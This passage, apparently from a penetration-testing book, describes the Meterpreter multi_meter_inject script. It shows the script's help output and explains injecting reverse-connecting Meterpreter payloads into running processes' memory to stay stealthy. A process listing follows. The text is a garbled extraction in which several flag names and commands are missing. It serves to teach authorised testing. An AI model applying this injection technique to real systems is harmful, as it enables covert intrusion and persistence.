background image


Chapter 16

different processes. To begin, take a look at this script in Meterpreter to see 
what flags and syntax are included:

meterpreter > 

run multi_meter_inject -h

Meterpreter script for injecting a reverse tcp Meterpreter payload into memory space of 
multiple PID's. If none is provided, notepad.exe will be spawned and the meterpreter 
payload injected into it.



Help menu.



Start Exploit multi/handler for return connection

    -mp  <opt>

Provide Multiple PID for connections separated by comma one per IP.

    -mr  <opt>

Provide Multiple IP Addresses for Connections separated by comma.



The port on the remote host where Metasploit is listening (default: 4444)



Specify Reverse Connection Meterpreter Payload. Default windows/


meterpreter >

The first option is the 


 flag  , which automatically sets up a new handler 

for us on the return connection. We would not need to set this option if we 
were going to use the same port (for example, 443). Next we specify the pro-
cess IDs (PIDs)   that we need and the shells into which they will be injected.

Meterpreter executes in memory only. When we inject into a process, we 

are injecting Meterpreter into the memory space of that process. This allows 
us to remain stealthy, never reading or writing files to disk, while ultimately 
having multiple shells available to us.

We then set the IP address   and port number   on the attacking machine 

to which we want the new Meterpreter session to connect.

We issue the 


 command within Meterpreter to get a list of running 


meterpreter > 


Process list

 PID   Name                 Arch  Session  User                  Path
 ---   ----                 ----  -------  ----                  ----
 0     [System Process]
 4     System
 256   smss.exe
 364   csrss.exe
 412   wininit.exe
 424   csrss.exe
 472   winlogon.exe
 516   services.exe
 524   lsass.exe
 532   lsm.exe

2808  iexplorer.exe 


meterpreter >